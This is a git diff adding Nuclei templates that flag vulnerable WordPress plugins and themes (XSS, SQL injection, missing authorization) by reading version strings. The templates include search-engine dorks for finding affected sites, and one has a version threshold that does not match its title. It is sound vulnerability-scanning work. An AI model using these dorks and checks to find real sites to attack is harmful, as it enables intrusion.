diff --git a/poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml b/poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml
new file mode 100644
index 0000000000..2ffb4c1197
--- /dev/null
+++ b/poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml
@@ -0,0 +1,59 @@
+id: essential-breadcrumbs-2267a02f90f738f304f189dd1027700a
+
+info:
+ name: >
+ Essential Breadcrumbs <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4838b8-7a9d-43b7-a577-7d7ae8bac5fa?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/essential-breadcrumbs/"
+ google-query: inurl:"/wp-content/plugins/essential-breadcrumbs/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,essential-breadcrumbs,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-breadcrumbs/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-breadcrumbs"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml b/poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml
new file mode 100644
index 0000000000..f488924f4d
--- /dev/null
+++ b/poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml
@@ -0,0 +1,59 @@
+id: event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e
+
+info:
+ name: >
+ Event Tickets with Ticket Scanner <= 2.4.4 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/event-tickets-with-ticket-scanner/"
+ google-query: inurl:"/wp-content/plugins/event-tickets-with-ticket-scanner/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,event-tickets-with-ticket-scanner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/event-tickets-with-ticket-scanner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "event-tickets-with-ticket-scanner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.3')
\ No newline at end of file
diff --git a/poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml b/poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml
new file mode 100644
index 0000000000..8ae777a492
--- /dev/null
+++ b/poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml
@@ -0,0 +1,59 @@
+id: fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428
+
+info:
+ name: >
+ FastBook – Responsive Appointment Booking and Scheduling System <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5fd2255-7f02-4de8-b904-a753580123b9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ google-query: inurl:"/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,fastbook-responsive-appointment-booking-and-scheduling-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fastbook-responsive-appointment-booking-and-scheduling-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml b/poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml
new file mode 100644
index 0000000000..0e008bd0e5
--- /dev/null
+++ b/poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml
@@ -0,0 +1,59 @@
+id: fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315
+
+info:
+ name: >
+ Elementor Button Plus <= 1.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f6c69ca-eb1e-445a-af72-5f03dfa07f9b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/fd-elementor-button-plus/"
+ google-query: inurl:"/wp-content/plugins/fd-elementor-button-plus/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,fd-elementor-button-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fd-elementor-button-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "fd-elementor-button-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.3')
\ No newline at end of file
diff --git a/poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml b/poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml
new file mode 100644
index 0000000000..8530b3b3eb
--- /dev/null
+++ b/poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml
@@ -0,0 +1,59 @@
+id: flixita-69e3979808a27506066d883a9f8eb4e6
+
+info:
+ name: >
+ Flixita <= 1.0.82 - Reflected Cross-Site Scripting via id Parameter
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/131b5d57-2af1-4cc5-8b4e-019a050c3bb8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/flixita/"
+ google-query: inurl:"/wp-content/themes/flixita/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,flixita,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/flixita/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "flixita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.82')
\ No newline at end of file
diff --git a/poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml b/poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml
new file mode 100644
index 0000000000..62e6e1dae1
--- /dev/null
+++ b/poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml
@@ -0,0 +1,59 @@
+id: folder-gallery-1e6185b69c7ba994a4d3f38a05160b82
+
+info:
+ name: >
+ Folder Gallery <= 1.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/folder-gallery/"
+ google-query: inurl:"/wp-content/plugins/folder-gallery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,folder-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/folder-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "folder-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.4')
\ No newline at end of file
diff --git a/poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml b/poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml
new file mode 100644
index 0000000000..af414b38b7
--- /dev/null
+++ b/poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml
@@ -0,0 +1,59 @@
+id: friends-808e945853b70d97c7af6eefcb7afa6c
+
+info:
+ name: >
+ Friends <= 3.2.1 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/friends/"
+ google-query: inurl:"/wp-content/plugins/friends/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,friends,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/friends/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "friends"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.1')
\ No newline at end of file
diff --git a/poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml b/poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml
new file mode 100644
index 0000000000..b4fc1b0eb6
--- /dev/null
+++ b/poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml
@@ -0,0 +1,59 @@
+id: gallery-videos-3ff175744c927034ff36b2d07fcbc5d1
+
+info:
+ name: >
+ YouTube Gallery and Vimeo Gallery Plugin <= 2.4.2 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.2')
\ No newline at end of file
diff --git a/poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml b/poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml
new file mode 100644
index 0000000000..bacf48b432
--- /dev/null
+++ b/poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml
@@ -0,0 +1,59 @@
+id: gallery-videos-f2aafb7e611c06dc54124ab527015f64
+
+info:
+ name: >
+ Video Gallery <= 2.4.1 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.1')
\ No newline at end of file
diff --git a/poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml b/poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml
new file mode 100644
index 0000000000..81dde4b40c
--- /dev/null
+++ b/poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml
@@ -0,0 +1,59 @@
+id: gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929
+
+info:
+ name: >
+ Gold Addons for Elementor <= 1.3.2 - Missing Authorization to Authenticated (Subscriber+) License Activation/Deactivation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gold-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/gold-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gold-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gold-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gold-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.2')
\ No newline at end of file
diff --git a/poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml b/poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml
new file mode 100644
index 0000000000..9662b9caf8
--- /dev/null
+++ b/poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml
@@ -0,0 +1,59 @@
+id: kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53c18834-3026-4d4d-888b-add314a0e56e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml b/poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml
new file mode 100644
index 0000000000..935872ec26
--- /dev/null
+++ b/poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml
@@ -0,0 +1,59 @@
+id: kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Subscriber+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/86632212-37b5-4280-8a2a-163957ad9787?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml b/poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml
new file mode 100644
index 0000000000..6bda5fb01f
--- /dev/null
+++ b/poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml
@@ -0,0 +1,59 @@
+id: kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Authenticated (Doctor/Receptionist+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2a3ee-7f95-478c-b3d7-c254b9472d42?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml b/poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml
new file mode 100644
index 0000000000..8d5e58f602
--- /dev/null
+++ b/poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml
@@ -0,0 +1,59 @@
+id: lenxel-core-4972ccccaaba94b2ac118dc56066bfe6
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/48086577-09fc-4406-b13f-2091b50d1719?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml b/poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml
new file mode 100644
index 0000000000..1b6725eeb4
--- /dev/null
+++ b/poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml
@@ -0,0 +1,59 @@
+id: lenxel-core-c40309757059a7c5f5e2a082116ad730
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dac404d-369c-4036-9c64-4afab021cbe8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml b/poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml
new file mode 100644
index 0000000000..92db10483b
--- /dev/null
+++ b/poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml
@@ -0,0 +1,59 @@
+id: load-more-posts-f94901beaffb62ce5c913ef672f4eb96
+
+info:
+ name: >
+ Load More Posts <= 1.4.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45dd9f6-9cc6-42d0-b03f-65fda85425f2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/load-more-posts/"
+ google-query: inurl:"/wp-content/plugins/load-more-posts/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,load-more-posts,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/load-more-posts/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "load-more-posts"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml b/poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml
new file mode 100644
index 0000000000..5e338f8e9d
--- /dev/null
+++ b/poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml
@@ -0,0 +1,59 @@
+id: mail-picker-303b0f9000254327c2e69e892380ecb9
+
+info:
+ name: >
+ Mail Picker <= 1.0.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4b4de145-bff1-4265-97bf-4085b4112a66?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mail-picker/"
+ google-query: inurl:"/wp-content/plugins/mail-picker/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mail-picker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mail-picker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mail-picker"
+ part: body
+
+ - type: dsl
+ dsl:
